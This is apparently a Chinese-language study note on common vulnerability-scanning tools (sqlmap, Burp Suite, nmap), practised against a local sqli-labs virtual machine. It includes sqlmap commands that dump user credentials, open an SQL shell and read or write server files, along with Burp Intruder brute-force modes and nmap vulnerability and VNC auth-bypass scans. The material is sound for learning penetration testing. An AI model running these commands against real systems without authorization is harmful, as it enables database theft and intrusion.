常用漏扫工具

sqlmap

介绍

sqlmap是一个自动化的sql注入工具，主要是扫描、发现并利用给定url的sql注入漏洞，内置非常多的插件。支持MySQL、Oracle、PostgreSQL、Microsoft Acess、IBM DB2、SQLite、Firebird、Sybase和SQP MaxDB。

• SQLMap采用5中SQL注入技术
  • 基于布尔类型盲注
  • 基于时间的盲注
  • 基于报错注入
  • 联合查看注入
  • 堆查询注入

基于sqlilabs实战

sqlmap -u 192.168.114.129:83/Less-1/?id=1

• 获取用户下的所有数据库

sqlmap -u 192.168.114.129:83/Less-1/?id=1 --dbs

• 获取数据库的表名
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 -D security --tables
  

• 获取表中的字段名
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 -D security -T users --columns
  

• 获取字段内容
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 -D security -T users -C username,password --dump
  

• 获取数据库用户的密码
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 --password
  

• 查询当前网站数据库名称
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 --current-db
  

• 获取数据库的所有用户
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 --users
  

• 查询当前网站数据库的用户名称
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 --current-user
  

相关参数

• --is-dba：当前用户是否为管理权限
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 --is-dba
  
  可以看出不是管理权限

• --roles:列出数据库管理员的角色(仅适用于Oracle）

• --referer:HTTP Referer头

• --sql-shell：运行自定义SQL语句
  sqlmap -u 192.168.114.129:83/Less-1/?id=1 --sql-shell

• --file-read:数据库中读取一个文件

• --file-write --file-dest：上传一个文件到数据库服务器

burp suite

介绍

burp suite 是通过拦截的方式，拦截所有通过代理的网络流量。主要拦截http和https。通过拦截，bp以中间人的方式对客户端的请求数据、服务端的返回信息做各种处理，以达到安全测试的目的

界面介绍

BrupSuite的工具箱：
Proxy–是一个拦截HTTP/S的代{过}{滤}理服务器，作为一个在浏览器和目标应用程序的中间人，允许你拦截，查看，修改在两个方向上的原始数据流。
Spider–是一个应用智能感应的网络爬虫，它能完整的枚举应用程序的内容和功能。
Scanner[仅限专业版]–是一个高级的工具，执行后，它能自动地发现web 应用程序的安全漏洞。
Intruder–是一个定制的高度可配置的工具，对web应用程序进行自动化攻击，如：枚举标识符，收集有用的数据，以及使用fuzzing 技术探测常规漏洞。Repeater–是一个靠手动操作来补发单独的HTTP 请求，并分析应用程序响应的工具。
Sequencer–是一个用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具。Decoder–是一个进行手动执行或对应用程序数据者智能解码编码的工具。
Comparer–是一个实用的工具，通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。

使用

proxy模块

• Burp Proxy拦截的客户端和服务器交互之后，我们可以在burp的消息分析选项中查看这次请求的实体内容，消息头，请求头，请求参数等信息。

---

以sqlilab-less 11为例
这里现在bp设置代理


需要输入账号密码

拦截请求打开
再次输入打开

抓到了uname和passwd就可进行操作

Scanner

主动扫描

会向应用发送新的请求并通过payload验证漏洞，这种模式下的操作会产生大量的请求和应答。适用于：

• 客户端的漏洞：XSS、HTTP头注入、操作重定向
• 服务端的漏洞：SQL注入、命令行注入、文件遍历

被动扫描

bp不会重新发送新请求，只是对已经存在的请求和应答进行分析。对服务段检测来说，是比较安全。适用于：

• 提交的密码未加密的明文
• 不安全的cookie属性，缺少HttpONLY和安全标志
• Cookie的范围缺失
• 跨域脚本包含和站点应用泄露
• 表单值自动填充，尤其密码
• SSL保护的内容缓存
• 目录列表
• Session令牌的不安全传输

repeater模块

是一个手动修改，不发个别HTTP请求，并分析他们响应的工具，可以将目标站点地图、burp proxy浏览记录、burp intruder的攻击结果，发送到repeater，手动调整这个请求来对漏洞探测攻击进行微调
可以右键选择发送给repeater

然后就可以在burp内部进行操作了

代理模块可以查看http历史记录。

Intruder

Burp Intruder 是一个自定义的对 web 应用程序进行自动化攻击的工具。
一个定制的高度可配置的工具，对web应用程序进行自动化攻击，如:枚举标识符，收集有用的数据，以及使用fuzzing技术探测常规漏洞。
高效地使用Burp Intruder，需要明白目标应用程序是怎样工作的，以及一些 HTTP协议的知识。在使用 Burp Intruder 进行攻击之前，需要调查清楚目标应用程序的功能和结构，尤其是在浏览器和服务器之间传输的HTTP 消息。可以使用标准浏览器和Burp Proxy 拦截和查看应用程序产生的请求和响应。

intruder可以进行缺陷测试、SQL注入、跨站点脚本、缓冲区溢出、路径遍历、暴力攻击认证系统、枚举、操纵参数、拖出隐藏的内容和功能、会话令牌测序和会话劫持、数据挖掘、并发攻击、应用层的拒绝服务式攻击。

sniper：使用单一payload组。会针对每个位置设置payload。适用于对常见漏洞中的请求参数单独进行Fuzzing测试。请求总数=positionpayload
Battering ram：使用单一payload。重复payload并一次性把所有相同payload放入指定的位置中。这种攻击适用于需要在请求中把相同的输入放到多个位置的情景。请求总数=payload+position
Pichfork：使用多个payload，攻击会迭代所有的payload组，把payload放入每个定义的韦志中。这种攻击类型适合在不同位置中需要插入不同但是相似输入的情况。请求数量是最小的
Cluster bomb：使用多个payload组，每个定义的位置中有不同的payload组。攻击会迭代每个payload，灭种payload组合都会被测试一遍。适用于在位置中需要不同且不相关或者未知输入攻击的情景。攻击请求总数是payloadposition

Comparer

主要提供一个可视化的差异对比功能，来对比分析两次数据之间的区别，使用到的场合有：

• 枚举用户名的过程中。对比分析登陆成功和失败时，服务端反馈结果的区别
• 使用intruder攻击时，对比不同的服务端响应，能分析出两次响应的区别在哪里
• 进行SQL注入的盲注时候，比较两次响应消息的差异，判断相应结果与注入条件的关联关系

spider模块

spider的蜘蛛爬行功能可以帮助我们了解系统的结构，其中spider爬取的内容将在target中展示

Sequencer

是一种用于分析数据样本随机性质量的工具。可以用它测试应用程序的会话令牌、密码重置令牌是否可预测等场景，通过Sequencer的数据样本分析，能很好的降低这些关键数据被伪造的风险

nmap

kali中输入nmap会显示版本号及帮助文件

相关参数

-iL:从文件中导入目标主机或网段
-iR：随机选择目标主机
--exclude：后面跟的主机或网段将不再扫描范围内
--excludefile:导入文件中的主机或网段将不再扫描范围中，与主机发现方法相关的参数如下
-sL：List Scan（列表扫描），仅列举制定目标的IP，不进行主机发现
-sn：Ping Scan，只进行主机发现，不进行端口扫描
-Pn：将所有制定的主机视作已开启，跳过主机发现的过程

操作

• 扫描单一目标地址
  nmap 192.168.114.129
  

• 扫描多个地址
  nmap 192.168.0.110 192.168.0.105
  

• 扫描范围地址
  nmap 192.168.114.0-110
  

• 扫描目标地址所在的某个网段
  C段为例，如果目标是一个网段，可以通过添加子网掩码的方式扫描，下面扫描的范围是192.168.0.1~192.168.0.255
  nmap 192.168.0.100/24

• 扫描主机列表target.txt中所有目标的地址
  nmap -iL 文件路径

• 扫描褚某一个目标地址之外的所有目标地址
  nmap 192.168.0.100/24 -exclude 192.168.0.105

• 对某一目标地址的21/22/23/80扫描
  nmap 192.1680.100 -p 21,22,23,80
  

• 对目标地址进行路由跟踪
  nmap --traceroute 192.168.0.105
  

• 扫描目标地址所在C段的在线状态
  nmap -sP 192.168.114.100/24
  

• 目标地址的操作系统指纹识别
  nmap -O 192.168.114.129

• 目标地址提供的服务版本检测

nmap -sV 192.168.114.126

• 探测防火墙状态
• 用FIN扫描方式探测防火墙的状态。FIN扫描用于识别端口是否关闭，收到RST恢复说明该端口关闭，否则就是open或filtered状态
  nmap -sF -T4 192.168.114.128
• 常见的6中nmap端口状态

状态	含义
open	开放的，表示应用程序正在监听该端口的链接，外部可以访问
filtered	被过滤的，表示端口正在被范获取或其他网络设备阻止，不能访问
closed	关闭的，表示目标主机未开启该端口
unfiltered	未被过滤的，表示nmap无法确定端口所处状态
open/filtered	开放的或被过滤的，nmap不能识别
closed /filtered	关闭的或被过滤的，nmap不能识别

• 扫描常见漏洞

# nmap --script=vuln 192.168.114.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 08:20 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.28% done; ETC: 08:21 (0:00:00 remaining)
Stats: 0:01:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.28% done; ETC: 08:21 (0:00:00 remaining)
Stats: 0:01:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.28% done; ETC: 08:21 (0:00:00 remaining)
Nmap scan report for localhost (192.168.114.129)
Host is up (0.0031s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
| http-vuln-cve2011-3192: 
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://www.tenable.com/plugins/nessus/55976
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.securityfocus.com/bid/49303
| http-enum: 
|_  /admin.php: Possible admin folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
81/tcp   open  hosts2-ns
82/tcp   open  xfer
83/tcp   open  mit-ml-dev
84/tcp   open  ctf
3306/tcp open  mysql
MAC Address: 00:0C:29:09:EA:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 105.46 seconds
                                                                                 

• 应用服务扫描
  nmap --script=realvnc-auth-bypass 192.168.114.129
  
• 探测局域网内更多服务开启的情况
  nmap -n -p 445 --script=broadcast 192.168.114.129
  
• whois 解析
  nmap -script external baidu.com